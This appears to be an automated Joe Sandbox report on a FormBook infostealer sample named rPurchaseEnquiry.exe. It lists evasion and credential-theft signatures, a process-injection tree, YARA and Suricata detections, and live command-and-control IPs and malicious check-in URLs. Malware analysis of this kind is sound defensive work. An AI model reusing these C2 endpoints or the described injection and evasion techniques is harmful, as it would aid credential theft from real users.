Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPurchaseEnquiry.exe

Overview

General Information

Sample name:rPurchaseEnquiry.exe
Analysis ID:1640955
MD5:f9a3e5d1584b73bc838519ceab7c16a7
SHA1:7aa34c36201de44d1efa8ddbb9d6775532e276a3
SHA256:17ec208e76a9cb83407ef2c2bc21dbabe9076cb59d1181bb41c1bc2443c73ed0
Tags:exeuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • rPurchaseEnquiry.exe (PID: 6708 cmdline: "C:\Users\user\Desktop\rPurchaseEnquiry.exe" MD5: F9A3E5D1584B73BC838519CEAB7C16A7)
    • svchost.exe (PID: 3992 cmdline: "C:\Users\user\Desktop\rPurchaseEnquiry.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rdDg0b2bK2qO9Yy1bQgDRyk.exe (PID: 5816 cmdline: "C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\dqQ0mkDU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • rasdial.exe (PID: 3876 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • rdDg0b2bK2qO9Yy1bQgDRyk.exe (PID: 2644 cmdline: "C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\so8sx4x9wKrIi.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7584 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.3648063161.0000000003560000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3646181884.0000000002FA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1308769709.00000000036D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.1308257094.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3648116990.00000000035B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\dqQ0mkDU.exe" , ParentImage: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe, ParentProcessId: 5816, ParentProcessName: rdDg0b2bK2qO9Yy1bQgDRyk.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 3876, ProcessName: rasdial.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", CommandLine: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", ParentImage: C:\Users\user\Desktop\rPurchaseEnquiry.exe, ParentProcessId: 6708, ParentProcessName: rPurchaseEnquiry.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", ProcessId: 3992, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", CommandLine: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", ParentImage: C:\Users\user\Desktop\rPurchaseEnquiry.exe, ParentProcessId: 6708, ParentProcessName: rPurchaseEnquiry.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPurchaseEnquiry.exe", ProcessId: 3992, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T22:31:34.476167+010028554651A Network Trojan was detected192.168.2.64968913.248.169.4880TCP
                2025-03-17T22:31:57.885193+010028554651A Network Trojan was detected192.168.2.64969413.248.169.4880TCP
                2025-03-17T22:32:19.318704+010028554651A Network Trojan was detected192.168.2.64970169.57.163.6480TCP
                2025-03-17T22:32:33.297119+010028554651A Network Trojan was detected192.168.2.649706188.114.97.380TCP
                2025-03-17T22:32:47.059474+010028554651A Network Trojan was detected192.168.2.649710213.142.151.12880TCP
                2025-03-17T22:33:05.444198+010028554651A Network Trojan was detected192.168.2.649714104.21.11.9980TCP
                2025-03-17T22:33:28.878283+010028554651A Network Trojan was detected192.168.2.64971847.83.1.9080TCP
                2025-03-17T22:33:42.343156+010028554651A Network Trojan was detected192.168.2.64972263.250.38.22380TCP
                2025-03-17T22:33:55.585186+010028554651A Network Trojan was detected192.168.2.6497263.33.130.19080TCP
                2025-03-17T22:34:12.017106+010028554651A Network Trojan was detected192.168.2.64973013.248.169.4880TCP
                2025-03-17T22:34:25.370241+010028554651A Network Trojan was detected192.168.2.64973452.20.84.6280TCP
                2025-03-17T22:34:47.549524+010028554651A Network Trojan was detected192.168.2.64973813.248.169.4880TCP
                2025-03-17T22:35:01.237178+010028554651A Network Trojan was detected192.168.2.64974247.83.1.9080TCP
                2025-03-17T22:35:14.589141+010028554651A Network Trojan was detected192.168.2.649746217.160.0.23680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T22:31:50.065219+010028554641A Network Trojan was detected192.168.2.64969113.248.169.4880TCP
                2025-03-17T22:31:52.605653+010028554641A Network Trojan was detected192.168.2.64969213.248.169.4880TCP
                2025-03-17T22:31:55.166536+010028554641A Network Trojan was detected192.168.2.64969313.248.169.4880TCP
                2025-03-17T22:32:11.686357+010028554641A Network Trojan was detected192.168.2.64969569.57.163.6480TCP
                2025-03-17T22:32:14.212744+010028554641A Network Trojan was detected192.168.2.64969769.57.163.6480TCP
                2025-03-17T22:32:16.799637+010028554641A Network Trojan was detected192.168.2.64969969.57.163.6480TCP
                2025-03-17T22:32:25.443268+010028554641A Network Trojan was detected192.168.2.649703188.114.97.380TCP
                2025-03-17T22:32:28.154853+010028554641A Network Trojan was detected192.168.2.649704188.114.97.380TCP
                2025-03-17T22:32:30.693559+010028554641A Network Trojan was detected192.168.2.649705188.114.97.380TCP
                2025-03-17T22:32:39.421821+010028554641A Network Trojan was detected192.168.2.649707213.142.151.12880TCP
                2025-03-17T22:32:41.965380+010028554641A Network Trojan was detected192.168.2.649708213.142.151.12880TCP
                2025-03-17T22:32:44.522182+010028554641A Network Trojan was detected192.168.2.649709213.142.151.12880TCP
                2025-03-17T22:32:57.817732+010028554641A Network Trojan was detected192.168.2.649711104.21.11.9980TCP
                2025-03-17T22:33:00.341503+010028554641A Network Trojan was detected192.168.2.649712104.21.11.9980TCP
                2025-03-17T22:33:02.895313+010028554641A Network Trojan was detected192.168.2.649713104.21.11.9980TCP
                2025-03-17T22:33:12.018425+010028554641A Network Trojan was detected192.168.2.64971547.83.1.9080TCP
                2025-03-17T22:33:14.565116+010028554641A Network Trojan was detected192.168.2.64971647.83.1.9080TCP
                2025-03-17T22:33:17.112038+010028554641A Network Trojan was detected192.168.2.64971747.83.1.9080TCP
                2025-03-17T22:33:34.589832+010028554641A Network Trojan was detected192.168.2.64971963.250.38.22380TCP
                2025-03-17T22:33:37.247034+010028554641A Network Trojan was detected192.168.2.64972063.250.38.22380TCP
                2025-03-17T22:33:39.701992+010028554641A Network Trojan was detected192.168.2.64972163.250.38.22380TCP
                2025-03-17T22:33:47.855090+010028554641A Network Trojan was detected192.168.2.6497233.33.130.19080TCP
                2025-03-17T22:33:50.440149+010028554641A Network Trojan was detected192.168.2.6497243.33.130.19080TCP
                2025-03-17T22:33:53.045876+010028554641A Network Trojan was detected192.168.2.6497253.33.130.19080TCP
                2025-03-17T22:34:01.096745+010028554641A Network Trojan was detected192.168.2.64972713.248.169.4880TCP
                2025-03-17T22:34:03.681211+010028554641A Network Trojan was detected192.168.2.64972813.248.169.4880TCP
                2025-03-17T22:34:06.220624+010028554641A Network Trojan was detected192.168.2.64972913.248.169.4880TCP
                2025-03-17T22:34:17.705427+010028554641A Network Trojan was detected192.168.2.64973152.20.84.6280TCP
                2025-03-17T22:34:20.251519+010028554641A Network Trojan was detected192.168.2.64973252.20.84.6280TCP
                2025-03-17T22:34:22.814356+010028554641A Network Trojan was detected192.168.2.64973352.20.84.6280TCP
                2025-03-17T22:34:31.940278+010028554641A Network Trojan was detected192.168.2.64973513.248.169.4880TCP
                2025-03-17T22:34:33.458597+010028554641A Network Trojan was detected192.168.2.64973613.248.169.4880TCP
                2025-03-17T22:34:36.000161+010028554641A Network Trojan was detected192.168.2.64973713.248.169.4880TCP
                2025-03-17T22:34:54.127745+010028554641A Network Trojan was detected192.168.2.64973947.83.1.9080TCP
                2025-03-17T22:34:56.009288+010028554641A Network Trojan was detected192.168.2.64974047.83.1.9080TCP
                2025-03-17T22:34:58.625155+010028554641A Network Trojan was detected192.168.2.64974147.83.1.9080TCP
                2025-03-17T22:35:06.931586+010028554641A Network Trojan was detected192.168.2.649743217.160.0.23680TCP
                2025-03-17T22:35:09.568061+010028554641A Network Trojan was detected192.168.2.649744217.160.0.23680TCP
                2025-03-17T22:35:12.034394+010028554641A Network Trojan was detected192.168.2.649745217.160.0.23680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: rPurchaseEnquiry.exeAvira: detected
                Source: https://eln.ycfxz9.motorcycles/cn/home/web/Avira URL Cloud: Label: malware
                Source: http://www.blogkart4u.xyz/apzq/Avira URL Cloud: Label: malware
                Source: http://www.blogkart4u.xyz/apzq/?Tnr4=au1daHn9wgKf20+4s5dbudIXdZzi7fKeXAClWCeNG3Sywxkl0XeeTL4ILw5N/PIPOKD1smdtPeAjU/QWU0zFhr8bb8xhTOARpfQ1YDYAX/Dg26UvL9QFnWin6MOo5kPAP1TFOYQ=&uPHHu=_z_tpP8HBf1h7LAvira URL Cloud: Label: malware
                Source: http://www.publicblockchain.xyz/ttj6/?uPHHu=_z_tpP8HBf1h7L&Tnr4=iF0RL9l91cg/r0ryQ96WkUNoN9S7LbfTbsX3VnFoQx5VcqP5rWYrT0esrSS4eYlVGZhUHSx68xLL+nijBbyUWKPBvFr7glfWA/g5tMixzA2ZYbFuPnI5pQcth7bM56Eo8KDC5n0=Avira URL Cloud: Label: malware
                Source: https://ari.kpmfw5.makeup/kpmfw/and/Avira URL Cloud: Label: malware
                Source: rPurchaseEnquiry.exeReversingLabs: Detection: 38%
                Source: rPurchaseEnquiry.exeVirustotal: Detection: 46%Perma Link
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3648063161.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3646181884.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308769709.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308257094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3648116990.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3648050899.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1309204270.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: rPurchaseEnquiry.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: rPurchaseEnquiry.exe, 00000000.00000003.1203442574.0000000004200000.00000004.00001000.00020000.00000000.sdmp, rPurchaseEnquiry.exe, 00000000.00000003.1205907538.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1209803857.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1207310111.0000000003400000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3648459343.00000000052EE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3648459343.0000000005150000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1308527422.0000000004DFB000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1310878759.0000000004FA1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000003.00000002.1308540176.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1275446554.000000000321A000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647058046.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000003.1245569343.0000000000E05000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: rPurchaseEnquiry.exe, 00000000.00000003.1203442574.0000000004200000.00000004.00001000.00020000.00000000.sdmp, rPurchaseEnquiry.exe, 00000000.00000003.1205907538.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1209803857.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1308807526.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1207310111.0000000003400000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000005.00000002.3648459343.00000000052EE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3648459343.0000000005150000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1308527422.0000000004DFB000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.1310878759.0000000004FA1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000003.00000002.1308540176.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1275446554.000000000321A000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647058046.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000003.1245569343.0000000000E05000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.3649099627.000000000577C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000005.00000002.3646734607.0000000003329000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377348600.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1595013346.000000004026C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.3649099627.000000000577C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000005.00000002.3646734607.0000000003329000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377348600.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1595013346.000000004026C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3646389970.00000000009CF000.00000002.00000001.01000000.00000007.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377100890.00000000009CF000.00000002.00000001.01000000.00000007.sdmp
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BF445A
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFC6D1 FindFirstFileW,FindClose,0_2_00BFC6D1
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BFC75C
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BFEF95
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BFF0F2
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BFF3F3
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BF37EF
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BF3B12
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BFBCBC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FBC6F0 FindFirstFileW,FindNextFileW,FindClose,5_2_02FBC6F0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax5_2_02FA9E40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h5_2_04FA04E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49697 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49704 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49716 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49708 -> 213.142.151.128:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49709 -> 213.142.151.128:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49712 -> 104.21.11.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49720 -> 63.250.38.223:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49726 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49706 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49724 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49732 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49730 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49694 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49718 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49741 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49695 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49701 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49714 -> 104.21.11.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49715 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49693 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49703 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49742 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49738 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49710 -> 213.142.151.128:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49721 -> 63.250.38.223:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49713 -> 104.21.11.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49731 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49711 -> 104.21.11.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49734 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49691 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49717 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49725 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49689 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49735 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49740 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49699 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 217.160.0.236:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49719 -> 63.250.38.223:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49723 -> 3.33.130.190:80
